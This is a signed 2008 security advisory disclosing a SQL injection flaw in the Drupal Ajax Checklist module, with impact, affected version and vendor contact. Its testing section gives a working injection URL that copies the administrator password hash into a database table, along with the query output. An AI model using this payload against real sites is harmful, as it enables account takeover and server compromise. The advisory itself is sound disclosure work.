-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Drupal Ajax Checklist Module SQL Injection Vulnerability * Discovery Date: Sept 15, 2008 * Security risk: high * Exploitable from: Remote * Vulnerability: SQL Injection * Discovered by: Justin C. Klein Keane Description Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team, third party modules are not reviewed for security. The Ajax Checklist module (http://drupal.org/project/ajax_checklist), created by AsciiKewl (http://drupal.org/user/147292) is designed to allow users to input dynamic checklists into nodes. These checklists can then be checked or unchecked with state tracked via AJAX calls to pages that store the state in the database. Due to poor input validation on the AJAX handling pages, this module is vulnerable to SQL injection attacks. Depending on configuration, these attacks could be carried out by remote unauthenticated users. Due to it's data driven design, SQL injection attacks pose a critical threat to Drupal installations and their hosts and could lead to full control over the webserver process. The critical flaw exists within the ajax_checklist_save() function (lines 61-84 of ajax_checklist.module). This function accepts three parameters ($nid,$qid, and $state), all of which can be manipulated via a properly crafted URL. These parameters are then used to craft SQL select, insert, and update statements without first being sanitized. Vulnerable Versions 5.x-1.0 dated 1007-Aug-18 was tested and shown vulnerable Testing for Vulnerability Calling the URL: http://sitename.tld/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20from%20users%20where%20uid=1),3),(4,4,%274/3/4 will cause the administrator password to be inserted into the ajax_checkbox table in the Drupal database: mysql> select * from ajax_checklist; +-----+------+----------------------------------+-------+ | nid | user | qid | state | +-----+------+----------------------------------+-------+ | 1 | 0 | 2 | 2 | | 3 | 3 | 4202b5f87a68583e20aae6917c8c33d1 | 3 | | 4 | 4 | 4 | 3 | +-----+------+----------------------------------+-------+ Impact Highly critical. Depending on configuration, this vulnerability could allow attackers to compromise the Drupal administrator account, an attack that can lead to web server and even host compromise since the administrator can configure file uploads and alter any content on the Drupal installation. Determining Version The ajax_checklist.info page for vulnerable versions displays the following information: ; $Id: ajax_checklist.info,v 1.1 2007/08/16 06:39:34 asciikewl Exp $ name = Ajax Checklist description = Creates filter-driven checklists with ajax updating to the database package = Other version = 5.x-0.1 ; Information added by drupal.org packaging script on 2007-08-18 version = "5.x-1.0" project = "ajax_checklist" datestamp = "1187416501" Determining version information on Drupal sites is trivial in many cases (ref http://www.madirish.net/?article=214). Vendor Response Drupal security team contacted September 17, 2008. A security patch and announcement should be available Wednesday September 24, 2008. - -- Justin C. Klein Keane http://www.MadIrish.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iPwEAQECAAYFAkjakiMACgkQkSlsbLsN1gAHqgb8Cn+KHQOHCJqZXhtd1Nuhhjjl aE2q0njdi9KX+zjNKPEqXhvY6BJNkj6ql0rea7acsxW3d+/0+eDlMQ1Y76nCznOk zBk1KU/6XymZ2xtvkxpxpAE1gaVbVtjeijuqAYkonQps8qdm6ZSV5UQpadjcxyFW 4UXmhXa0lithie8nR8P7Hej6BiqeGMQLr+kHPFK0JdvtfW6sFziXXbzNzGNgTjFV 51S/qbb8K5q1EwMs23JXHu5tFWEZWmgFBPn8dva+uxYQDxO80nSovuh+itqzO9jz 8pCjulvjPEO8xg8PE4Q= =/d0S -----END PGP SIGNATURE-----